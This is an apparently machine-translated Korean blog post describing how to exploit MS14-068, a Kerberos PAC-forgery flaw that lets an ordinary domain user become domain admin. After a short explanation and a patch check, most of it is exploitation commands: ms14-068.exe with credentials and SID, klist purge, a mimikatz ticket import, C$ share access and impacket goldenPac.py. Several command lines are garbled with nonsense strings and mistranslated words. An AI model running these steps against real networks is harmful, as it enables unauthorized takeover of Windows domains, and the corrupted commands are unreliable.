제목 : 도메인 침투 | MS14-068

MS14-068

MS14-068​

https://www.se7ensec.cn/2021/10/20/域渗透-Kerberos% E5%9f%9f%E8%AE%A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%90/#PAC-1
MS14068은 일반 사용자가 도메인 제어 권한에 대한 권한을 높일 수있는 권한 에스컬레이션 취약성입니다. 공격자는 특정 요청 패킷을 구성하여 권한을 높이기위한 목적을 달성 할 수 있습니다.
이 취약점의 주요 문제는 KDC가 PAC의 디지털 서명과 PAC의 암호화 알고리즘을 지정하는 암호화 알고리즘을 기반으로 PAC의 정당성을 확인할 것입니다. 이를 통해 공격자는 PAC를 단조하여 PAC에서 SID를 수정하여 KDC가 공격자가 유명한 사용자임을 판단하여 권한 에스컬레이션 취약성이 발생할 수 있습니다.
취약성 패치 주소 주소 : https://technet.microsoft.com/zh-cn/library/security/ms14-068

利用方式​

MS14-068의 해당 패치는 KB3011780입니다. 이 패치가 도메인 컨트롤의 SystemInfo를 통해 설치되어 있는지 확인할 수 있습니다.
1SystemInfo | 찾기 '3011780'

keoko​

12klist 퍼지는 퍼지 클리어 빌 Clear Bill Kekeo 'Exploit333333333333333:rootkit.org /user3:sqladmin /password3:admin12345 /ptt' ':10101010101010101010101010101010110101010101010 PY : https://github.com/mubix/pykek
exe : https://github.com/ianxtianxt/ms14-068
매개 변수 설명 :
-U 도메인 계정 @도메인 이름
-P는 현재 사용자의 비밀번호입니다
-S는 현재 사용자의 SID 값입니다. 사용자의 SID 값은 Whoami/All을 통해 얻을 수 있습니다.
-D는 현재 도메인의 도메인 제어입니다
–RC4 현재 사용자를위한 해시
DIR을 통해 도메인 제어 공유 폴더에 대한 액세스가 거부 될 액세스 권한이 있습니다. 1dir \\ owa2013.rootkit.org \ C $
티켓 1ms14-068.exe -u [email protected] -p admin12345 -s s-1-5-21-375981954-2993291187-3577547808-1613 -D OWA2013.ROOTKIT.org.
스크립트가 성공적으로 실행되면 현재 디렉토리에서 CCACHE 파일이 생성됩니다. 티켓을 가져 오기 전에 CMD의 명령 klist 퍼지를 사용하거나 Mimikatz에서 Kerberos:purge를 사용하여 현재 캐시 된 Kerberos 티켓을 삭제하십시오. 1klist 퍼지
mimikatz 1mimikatz 'kerberos3:ptc [email protected]'Exit을 사용하여 생성 된 CCACH 파일 가져 오기
DIR로 도메인 제어 공유에 성공적으로 액세스 할 수 있습니다.

Pykek​

GoldenPac.py Impacket 도구 키트 에서이 도구는 MS14-068 PSEXEC를 결합하는 제품으로 사용하기 쉽습니다.
1python goldenpac.py -dc-ip 192.168.3.144 -Target-IP 192.168.3.144 rootkit.org/sqladmin:[email protected]

goldenPac​

 
뒤로
상단